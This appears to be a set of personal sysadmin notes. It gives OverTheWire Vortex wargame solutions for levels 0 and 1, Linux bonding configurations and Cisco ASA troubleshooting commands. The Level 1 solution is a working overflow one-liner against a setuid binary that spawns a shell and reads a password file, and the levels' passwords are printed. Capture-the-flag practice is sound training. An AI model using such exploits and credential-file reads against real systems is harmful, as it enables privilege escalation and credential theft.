# Vortex wargame: Level 1


# ssh vortex1@vortex.labs.overthewire.org
vortex1@vortex.labs.overthewire.org's password:477123717533624633

$ file /vortex/vortex1
/vortex/vortex1: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
$ (for i in `seq 1 10`; do perl -e 'print "\x5c"x89000000'; done; perl -e 'print "\x21"'; cat) | /vortex/vortex1
/usr/bin/whoami
vortex2
/bin/cat /etc/vortex_pass/vortex2
3233616e62545c7245

# Vortex wargame: Level 0


# cat v0.c
#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>

int main(int argc,char *argv[]){
 int sfd,s;
 struct addrinfo server_hints;
 struct addrinfo *server_result;
 memset(&server_hints,0,sizeof(struct addrinfo));
 server_hints.ai_family=AF_UNSPEC;
 server_hints.ai_socktype=SOCK_STREAM;
 server_hints.ai_protocol=0;
 getaddrinfo(argv[1],argv[2],&server_hints,&server_result);
 sfd=socket(server_result->ai_family,server_result->ai_socktype,server_result->ai_protocol);
 if(connect(sfd,server_result->ai_addr,server_result->ai_addrlen)!=-1){
  freeaddrinfo(server_result);
  int i,result,uint[4];
  char credentials[64];
  bzero(credentials,sizeof(credentials));
  result=0;
  for(i=0;i<4;i++){
   recv(sfd,&uint[i],sizeof(int),0);
   printf("uint[%d] = %d\n",i,uint[i]);
   result+=uint[i];
  }
  send(sfd,&result,sizeof(int),0);
  recv(sfd,credentials,sizeof(credentials),0);
  printf("%s\n",credentials);
  close(sfd);
 }
 return 0;
}
# gcc -o v0 v0.c
# ./v0 vortex.labs.overthewire.org 5842
uint[0] = 1643010444
uint[1] = 1050412351
uint[2] = 559062867
uint[3] = 556524630
Username: vortex1 Password: 477123717533624633

# Linux ethernet bonding configuration


Software

# apt-get install ifenslave-2.6
# modprobe bonding
Bonding modes and switch configuration dependency

mode 0 (rr): etherchannel mode on
mode 1 (a-b): access port
mode 2 (xor): etherchannel mode on
mode 3 (broadcast): ¿?
mode 4 (LACP): etherchannel mode active
mode 5 (TLB): access port
mode 6 (ALB): access port

Balance-xor or mode 2

# cat /etc/network/interfaces
auto eth1
iface eth1 inet manual
 bond-master bond0

auto eth2
iface eth2 inet manual
 bond-master bond0

auto eth3
iface eth3 inet manual
 bond-master bond0

auto eth4
iface eth4 inet manual
 bond-master bond0

auto bond0
iface bond0 inet static
 address 192.168.5.69
 netmask 255.255.255.0
 network 192.168.5.0
 broadcast 192.168.5.255
 gateway 192.168.5.254
 dns-nameservers 192.168.125.100
 bond-slaves none
 bond-mode 2
 bond-miimon 100
 bond-use_carrier 1
 bond-downdelay 200
 bond-updelay 200
 bond-lacp-rate 0
 bond-xmit_hash_policy layer3+4
Switch(config)# port-channel load-balance src-dst-port
Switch(config)# interface range fa0/1-4
Switch(config-if-range)# channel-group 1 mode on
802.3ad or mode 4 (LACP)

# cat /etc/network/interfaces
auto eth1
iface eth1 inet manual
 bond-master bond0

auto eth2
iface eth2 inet manual
 bond-master bond0

auto eth3
iface eth3 inet manual
 bond-master bond0

auto eth4
iface eth4 inet manual
 bond-master bond0

auto bond0
iface bond0 inet static
 address 192.168.5.69
 netmask 255.255.255.0
 network 192.168.5.0
 broadcast 192.168.5.255
 gateway 192.168.5.254
 dns-nameservers 192.168.125.100
 bond-slaves none
 bond-mode 4
 bond-miimon 100
 bond-use_carrier 1
 bond-downdelay 200
 bond-updelay 200
 bond-lacp-rate 0
 bond-xmit_hash_policy layer2+3 # layer3-4 is not fully 802.3ad compliant
Switch(config)# port-channel load-balance src-dst-ip
Switch(config)# interface range fa0/1-4
Switch(config-if-range)# channel-group 1 mode active
Balance-tlb or mode 5 (Adaptive transmit load balancing)

# cat /etc/network/interfaces
auto eth1
iface eth1 inet manual
 bond-master bond0

auto eth2
iface eth2 inet manual
 bond-master bond0

auto eth3
iface eth3 inet manual
 bond-master bond0

auto eth4
iface eth4 inet manual
 bond-master bond0

auto bond0
iface bond0 inet static
 address 192.168.5.69
 netmask 255.255.255.0
 network 192.168.5.0
 broadcast 192.168.5.255
 gateway 192.168.5.254
 dns-nameservers 192.168.125.100
 bond-slaves none
 bond-mode 5
 bond-miimon 100
 bond-use_carrier 1
 bond-downdelay 200
 bond-updelay 35000
- No switch configuration needed.
- For each slave interface, the host sends three LLC frames per second, 60 bytes of size for each one.
- Each frame uses the MAC of the slave interface as source and destination address.
- The IP packets do not update the ARP table.
- From host view, packets are transmited for each slave interface and received only for one.
- Traffic received is influenced by sending ARP requests to hosts in the same VLAN.

Balance-alb or mode 6 (Adaptive load balancing)

# cat /etc/network/interfaces
auto eth1
iface eth1 inet manual
 bond-master bond0

auto eth2
iface eth2 inet manual
 bond-master bond0

auto eth3
iface eth3 inet manual
 bond-master bond0

auto eth4
iface eth4 inet manual
 bond-master bond0

auto bond0
iface bond0 inet static
 address 192.168.5.69
 netmask 255.255.255.0
 network 192.168.5.0
 broadcast 192.168.5.255
 gateway 192.168.5.254
 dns-nameservers 192.168.125.100
 bond-slaves none
 bond-mode 6
 bond-miimon 100
 bond-use_carrier 1
 bond-downdelay 200
 bond-updelay 35000
- No switch configuration needed.
- For each slave interface, the host sends three LLC frames per second, 60 bytes of size for each one.
- Each frame uses the MAC of the slave interface as source and destination address.
- The IP packets do not update the ARP table.
- From host view, packets are transmited and received for each slave interface.
- Traffic received is influenced by sending ARP requests to hosts in the same VLAN.

Reference

https://www.kernel.org/doc/Documentation/networking/bonding.txt

# ASA troubleshooting commands


Resource use

# show cpu usage detailed
# show memory
# show blocks
Hardware and license information

# show version
# show module all
# show mode
Connections and translations

# show conn
! idle == no packets received for the last x seconds
# show perfmon
# show nat
! idle == last conn created was x seconds ago 
! i-dynamic.timeout == will begin when the last conn is removed (3 hours)
! r-portmap.timeout == will begin when the last conn is removed (30 seconds)
! s-static.timeout == does not have
# show xlate
# show local-host
Drops

# show service-policy
# show asp drop
# show logging
High availability

# show failover
Interface information

# show ip
# show nameif
# show traffic
Debug

# terminal monitor ! SSH sessions
# debug icmp trace
# debug arp
# debug esmtp
# debug http
Logging

(config)# logging enable
(config)# logging timestamp
(config)# logging buffered debugging
(config)# logging buffer-size 65000
# show logging
Packet capture

(config)# access-list capture_acl extended permit ip host 1.1.1.1 host 2.2.2.2
(config)# access-list capture_acl extended permit ip host 2.2.2.2 host 1.1.1.1
# capture capture_name interface interface_name access-list capture_acl
# clear capture capture_name
# show capture capture_name
! wget -O capture_name.pcap --user=asa_user --password=asa_password https://asa_ip/capture/capture_name/pcap
# no capture capture_name
Packet-tracert

# packet-tracer input interface_name tcp 1.1.1.1 1234 2.2.2.2 5678
VPN

# show crypto isakmp sa
# show crypto ipsec sa